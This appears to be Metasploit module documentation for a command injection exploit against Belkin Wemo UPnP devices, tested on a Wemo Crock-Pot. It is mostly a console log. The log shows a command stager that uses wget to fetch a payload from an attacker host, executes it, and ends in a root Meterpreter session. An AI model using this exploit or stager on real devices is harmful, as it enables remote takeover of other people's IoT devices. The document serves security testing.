## Introduction

This module exploits a command injection in the Belkin Wemo UPnP API via
the `SmartDevURL` argument to the `SetSmartDevInfo` action.

This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
devices are known to be affected, albeit on a different `RPORT` (49153).

## Setup

You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.

## Targets

```
Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper
```

## Options

**RPORT**

Set this to the Wemo device's UPnP port. In our testing, this was 49152
for Crock-Pot and 49153 for other devices.

## Usage

```
msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run

[*] Started reverse TCP handler on 10.22.22.4:4444
[+] Wemo-enabled device detected
[*] Found firmware version: 2.00.6461
[+] Firmware version 2.00.6461 < 2.00.8643
[*] 10.22.22.1:49152 - The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
[*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
[*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
[*] Regenerated command stager: cp /bin/sh /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6;/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P
[*] Client 10.22.22.1 (Wget) requested /CKgRyLqQZtBY6
[*] Sending payload to 10.22.22.1 (Wget)
[*] Transmitting intermediate stager...(164 bytes)
[*] Sending stage (1252312 bytes) to 10.22.22.1
[*] Meterpreter session 1 opened (10.22.22.4:4444 -> 10.22.22.1:4607) at 2019-02-12 14:37:37 -0600
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.22.22.1
OS           :  (Linux 2.6.21)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter >
```
